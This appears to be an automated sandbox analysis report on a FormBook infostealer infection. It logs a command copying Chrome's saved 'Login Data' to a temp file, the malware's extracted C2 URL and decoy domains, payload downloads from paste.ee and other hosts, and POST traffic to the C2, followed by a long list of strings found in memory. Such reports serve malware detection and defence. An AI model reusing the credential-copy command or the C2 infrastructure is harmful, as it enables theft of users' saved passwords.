            Stealing of Sensitive Information

            Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\colorcpl.exe", ParentImage: C:\Windows\SysWOW64\colorcpl.exe, ParentProcessId: 4584, ParentProcessName: colorcpl.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 1704, ProcessName: cmd.exe
            No Snort rule has matched


            AV Detection

            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lunazone.us/m07a/"], "decoy": ["shakishaskakes.com", "com222.shop", "thailand-package.in", "apexu.xyz", "xlmagnemite.com", "nagapura.com", "auralights.store", "springupfashionsalon.com", "ecoessentiaer.shop", "myorra.com", "xasvcd.xyz", "zachbynesdesigns.art", "qdaoxingsujiao.com", "workproapi.site", "pbmengineering.com", "cioccasubaruspecials.com", "tmotest.com", "yipaijihejiaoyu.com", "msaway.com", "jfn3d.cc", "potentpolitics.com", "gumuszemin.com", "elimmedcentre.com", "tveuropetravel.com", "cryptoshipping-cargo.site", "123b.bingo", "auspilifepharma.com", "nacob.top", "cnexam.net", "royal-buttons.com", "stanleywarner.autos", "s1mple-giveaways.com", "cairns.care", "slimshakeshop.online", "speakgeni.us", "qnttlw.com", "kitty-fit.com", "recordlabeltime.com", "balancceer.top", "cerkust.info", "cursosead.pro", "ukrfilmtrest.com", "rewardraptor.net", "welqi.com", "chronotypecolab.com", "loj-wroie.com", "lauracecilia.com", "luminouscar.info", "theschoolofbooks.shop", "manjuc.xyz", "successchasersltd.com", "matchuplover.com", "proomtb.com", "rankrise.shop", "theiceden.co", "adeptetho.com", "myshup.net", "bet7839.com", "propertiesfinance.com", "izii.online", "herb.boutique", "nobook.xyz", "yucampos.co", "liabillityinsurance.com"]}
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00416C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00416CCF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi5_2_00417DA5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi8_2_02F46CD4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop edi8_2_02F47DA5

            Networking

            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443
            Source: C:\Windows\explorer.exeNetwork Connect: 203.161.57.217 80
            Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.95 80
            Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80
            Source: Malware configuration extractorURLs: www.lunazone.us/m07a/
            Source: unknownDNS query: name: paste.ee
            Source: DNS query: www.xasvcd.xyz
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /download?resid=4E6F63F4C3C86180%21112&authkey=!AJi85Fsyq6pgUBw HTTP/1.1Host: onedrive.live.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=FhT5TC53u3Z5TMdVNb/kS0zfz8OkKD2EUSj1eX+RC4J/yfdC5W2U1xrbN9PF9xQNo6z4&CN6=8pHxU0H HTTP/1.1Host: www.msaway.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /m07a/?r0=kbHmn/9MInRG3rqwWMOzjv0FEYEHMcqozMEbxoNxlifqHhdD1tGr+ls2dZBuYaiV3Vua&CN6=8pHxU0H HTTP/1.1Host: www.lunazone.usConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
            Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
            Source: Joe Sandbox ViewIP Address: 104.21.45.138 104.21.45.138
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 6_2_0B411F82 getaddrinfo,SleepEx,setsockopt,recv,6_2_0B411F82
            Source: global trafficHTTP traffic detected: GET /d/K2No9 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: paste.ee
            Source: unknownHTTP traffic detected: POST /m07a/ HTTP/1.1Host: www.msaway.comConnection: closeContent-Length: 175500Cache-Control: no-cacheOrigin: http://www.msaway.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msaway.com/m07a/Accept-Language: en-USAccept-Encoding: gzip, deflate
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Thu, 18 Apr 2024 19:12:11 GMTServer: ApacheData Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Thu, 18 Apr 2024 19:12:14 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Apr 2024 19:12:52 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.xasvcd.xyz Port 80</address></body></html>
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.com/m07a/www.qdaoxingsujiao.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.matchuplover.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.com/m07a/www.shakishaskakes.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msaway.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.top/m07a/www.matchuplover.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nacob.topReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.com/m07a/www.welqi.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.potentpolitics.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.com/m07a/www.yipaijihejiaoyu.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.propertiesfinance.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.com/m07a/www.workproapi.site
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qdaoxingsujiao.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.royal-buttons.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.com/m07a/www.xasvcd.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shakishaskakes.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.com/m07a/www.propertiesfinance.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.welqi.comReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.site/m07a/www.royal-buttons.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.workproapi.siteReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2948630772.0000000010DD9000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932965402.00000000057A9000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyz/m07a/www.lunazone.us
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xasvcd.xyzReferer:
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.com/m07a/www.apexu.xyz
            Source: explorer.exe, 00000006.00000002.2946757811.000000000CB20000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yipaijihejiaoyu.comReferer:
            Source: explorer.exe, 00000006.00000002.2944714584.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1815748916.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000006.00000002.2934766401.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: powershell.exe, 00000001.00000002.2217742539.000001DC3FFDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000001.00000002.2217742539.000001DC4002C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820058355.0000029F05781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000006.00000000.1790977518.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2931305146.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2932559264.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1789968417.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000006.00000002.2938230118.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1807070242.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000006.00000000.1807070242.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2938230118.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
